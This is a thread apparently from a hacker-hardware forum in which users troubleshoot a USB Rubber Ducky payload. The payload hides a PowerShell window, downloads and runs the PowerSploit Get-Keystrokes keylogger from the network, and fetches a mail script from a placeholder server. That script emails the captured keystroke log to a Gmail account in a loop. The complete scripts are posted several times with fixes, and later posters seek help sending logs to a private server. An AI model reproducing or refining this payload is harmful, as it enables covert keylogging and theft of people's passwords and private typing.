PoSHMagiC0de Posted April 27, 2018 Share Posted April 27, 2018 (edited) Just guessing but the issue might be on this line. I don't use smtpclient in Powershell but instead use send-mailmessage. But...the issue with the smtpclient in the script maybe this and the correction that may need to happen. while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} should be maybe??? while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} The attachment of the mailmessage object takes an attachment object. Edited April 27, 2018 by PoSHMagiC0de forgot extra parenthesis. Quote Link to comment Share on other sites More sharing options...
714Lemons Posted April 28, 2018 Share Posted April 28, 2018 Hey my Problem is that Things like //:https are written in powershell like ähttpsÖ any ideas how to fix this? Quote Link to comment Share on other sites More sharing options...
714Lemons Posted April 28, 2018 Share Posted April 28, 2018 nervermind got it Quote Link to comment Share on other sites More sharing options...
mrskannk Posted April 30, 2018 Share Posted April 30, 2018 On 4/27/2018 at 4:16 AM, PoSHMagiC0de said: Just guessing but the issue might be on this line. I don't use smtpclient in Powershell but instead use send-mailmessage. But...the issue with the smtpclient in the script maybe this and the correction that may need to happen. while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} should be maybe??? while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} The attachment of the mailmessage object takes an attachment object. Hey thank for reply , y try to modify the mail.ps1 with while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} i'm still getting the same issue .. empty emails. I can't solve this probleme ? Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 30, 2018 Share Posted April 30, 2018 Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Where ever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. if you get no key.txt or no stuff in it then the keylogger is not logging. Quote Link to comment Share on other sites More sharing options...
mrskannk Posted April 30, 2018 Share Posted April 30, 2018 31 minutes ago, PoSHMagiC0de said: Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Where ever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. if you get no key.txt or no stuff in it then the keylogger is not logging. Nop , i ad a look on %temp% et there is no log.txt created tryed both script , same issue . Getting empty mails https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1 https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1 Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 30, 2018 Share Posted April 30, 2018 Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked. Quote Link to comment Share on other sites More sharing options...
mrskannk Posted April 30, 2018 Share Posted April 30, 2018 (edited) 19 minutes ago, PoSHMagiC0de said: Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked. Thank's , so if a got it right tue script should look like this . I'm going to try in a sec So if a followed you right tu script should look like this DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'xxxx@gmail.com' $ReportEmail.To.Add('xxxx@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} Edited April 30, 2018 by mrskannk Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 30, 2018 Share Posted April 30, 2018 Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device. So, above I was trying to have you just jump on your test machine. Run powershell and just use the two line commands I put out. The first will download and launch get-keystokes function to memory for use. Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong but atleast you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work. Now if it does then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works. Quote Link to comment Share on other sites More sharing options...
DimiBoy Posted June 5, 2018 Share Posted June 5, 2018 Well if you like I made a video of another version which sends an email after the timer is passed on the keylogger with the log. I think it might actually be useful for developers (ye I might be naive)https://www.youtube.com/watch?v=iAH5ruyo2VY Quote Link to comment Share on other sites More sharing options...
Félix Thiollize Posted October 23, 2021 Share Posted October 23, 2021 Hello everyone, I''ve been trying for days to transform this script so that it can send me the file with the results to my private server and not my email. Does anyone have any idea concerning the Ducky or powershell code ? Thank you Good evening Quote Link to comment Share on other sites More sharing options...
khalilzerei999 Posted January 16, 2022 Share Posted January 16, 2022 On 3/8/2017 at 6:57 AM, Speed09 said: I'm not good at powershell at all, but I managed to get the exfiltrate working. I simply modified the payload to run a ps script from my server that will send me the log file via email. Here is the final ducky script: DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1') ENTER And here is the mail.ps1 content: $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'youradress@gmail.com' $ReportEmail.To.Add('youradress@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} hi im a beginner and i use a micro pro arduino board as a rubber ducky what should i change from this script as personal information?? please i need help Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 16, 2022 Share Posted January 16, 2022 I guess that the end of that quote is actually your question. I'd suggest that you ask the question in some forum (or whatever) that is relevant to your hardware since you obviously isn't using a Hak5 USB Rubber Ducky. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.